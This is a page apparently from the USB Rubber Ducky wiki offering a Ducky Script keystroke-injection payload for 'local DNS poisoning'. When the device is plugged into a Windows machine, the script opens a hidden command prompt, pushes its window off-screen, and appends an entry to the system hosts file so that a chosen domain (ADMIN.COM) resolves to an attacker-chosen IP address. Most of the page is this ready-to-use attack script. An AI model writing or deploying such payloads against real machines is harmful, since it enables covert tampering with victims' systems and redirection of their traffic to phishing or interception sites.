Payload local dns poisoning

The following is a local DNS poisoning attack that changes a hosts 'host' file. The host will then be redirected to the website of your choice (IP Address), every time the user types in the given domain name in their browser.

REM Author:ashbreeze96 and overwraith
GUI R
STRING cmd /Q /D /T:7F /F:OFF /V:ON /K
DELAY 500
ENTER
DELAY 750
ALT SPACE
STRING M
DOWNARROW
REPEAT 100
ENTER
DELAY 50
STRING ECHO. >> C:\WINDOWS\SYSTEM32\DRIVERS\ETC\HOSTS
DELAY 50
ENTER
DELAY 50
STRING ECHO 10.0.0.1 ADMIN.COM >> C:\WINDOWS\SYSTEM32\DRIVERS\ETC\HOSTS
DELAY 50
ENTER
STRING exit
ENTER

Ducky Wiki

Home
Downloads
Tutorials
Language Maps
Software Encoder
- DuckEncoder
- Duckyscript
Software Payloads
- My First Payload
- Payloads
Advanced
Firmware
- Firmware Guide
HID Codes
Known VID/PIDs
License
- Atmel

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

Payload local dns poisoning

Ducky Wiki

Clone this wiki locally